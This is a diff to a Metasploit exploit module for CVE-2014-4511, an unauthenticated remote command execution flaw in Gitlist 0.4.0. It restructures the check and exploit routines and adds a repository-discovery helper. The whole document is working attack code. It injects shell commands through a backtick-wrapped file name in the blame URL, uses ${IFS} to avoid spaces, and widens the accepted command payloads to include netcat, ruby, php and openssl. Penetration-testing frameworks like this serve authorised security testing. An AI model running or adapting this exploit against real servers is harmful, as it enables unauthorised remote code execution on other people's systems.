Clean code

modules/exploits/linux/http/gitlist_exec.rb

@@ -12,10 +12,11 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Gitlist Unauthenticated Command Execution',
+      'Name'           => 'Gitlist Unauthenticated Remote Command Execution',
       'Description'    => %q{
-      This module exploits an unauthenticated remote command execution vulnerability
+          This module exploits an unauthenticated remote command execution vulnerability
-      in version 0.4.0 of Gitlist.
+        in version 0.4.0 of Gitlist. The problem exists in the handling of an specially
+        crafted file name when trying to blame it.
       },
       'License'        => MSF_LICENSE,
       'Privileged'     => false,
@@ -23,24 +24,24 @@ class Metasploit3 < Msf::Exploit::Remote
       'Arch'           => ARCH_CMD,
       'Author'         =>
         [
-          '@dronesec', #discovery/poc
+          'drone', #discovery/poc by @dronesec
           'Brandon Perry <bperry.volatile@gmail.com>' #Metasploit module
         ],
       'References'     =>
         [
           ['CVE', '2014-4511'],
-          ['URL', 'http://hatriot.github.io/blog/2014/06/29/gitlist-rce/'],
+          ['EDB', '33929'],
-          ['EDB', '33929']
+          ['URL', 'http://hatriot.github.io/blog/2014/06/29/gitlist-rce/']
         ],
       'Payload'        =>
         {
-          'Space'       => 9999, #arbitrary, length of GET request really
+          'Space'       => 8192, # max length of GET request really
           'BadChars'    => "&\x20",
           'DisableNops' => true,
           'Compat'      =>
             {
               'PayloadType' => 'cmd',
-              'RequiredCmd' => 'generic telnet python perl bash',
+              'RequiredCmd' => 'generic telnet python perl bash gawk netcat netcat-e ruby php openssl',
             }
         },
       'Targets'        =>
@@ -58,43 +59,61 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-    chk = Rex::Text.encode_base64(rand_text_alpha(rand(32)+5))
+    repo = get_repo
 
-    res = send_command("echo${IFS}" + chk + "|base64${IFS}--decode")
+    if repo.nil?
-
+      return Exploit::CheckCode::Unknown
-    if res && res.body.include?(Rex::Text.decode_base64(chk))
-      return Exploit::CheckCode::Vulnerable
     end
 
-    return Exploit::CheckCode::Safe
+    chk = Rex::Text.encode_base64(rand_text_alpha(rand(32)+5))
+
+    res = send_command(repo, "echo${IFS}" + chk + "|base64${IFS}--decode")
+
+    if res && res.body
+      if res.body.include?(Rex::Text.decode_base64(chk))
+        return Exploit::CheckCode::Vulnerable
+      elsif res.body.to_s =~ /sh.*not found/
+        return Exploit::CheckCode::Vulnerable
+      end
+    end
+
+    Exploit::CheckCode::Safe
   end
 
   def exploit
-    send_command(payload.encoded)
+    repo = get_repo
+    if repo.nil?
+      fail_with(Failure::Unknown, "#{peer} - Failed to retrieve the remote repository")
+    end
+    send_command(repo, payload.encoded)
   end
 
-  def send_command(cmd) 
+  def get_repo
     res = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path)
+      'uri' => normalize_uri(target_uri.path, "/")
     })
 
     unless res
-      fail_with("Server did not respond in an expected way")
+      return nil
     end
 
-    first = /href="\/gitlist\/(.*)\/"/.match(res.body)
+    first_repo = /href="\/gitlist\/(.*)\/"/.match(res.body)
 
-    unless first && first.length >= 2
+    unless first_repo && first_repo.length >= 2
-      fail_with("We don't have a properly configured Gitlist installation")
+      return nil
     end
 
-    first = first[1]
+    repo_name = first_repo[1]
 
+    repo_name
+  end
+
+  def send_command(repo, cmd)
     res = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path, first, 'blame', 'master', '""`' + cmd + '`')
+      'uri' => normalize_uri(target_uri.path, repo, 'blame', 'master', '""`' + cmd + '`')
-    })
+    }, 1)
 
-    return res
+    res
   end
 
 end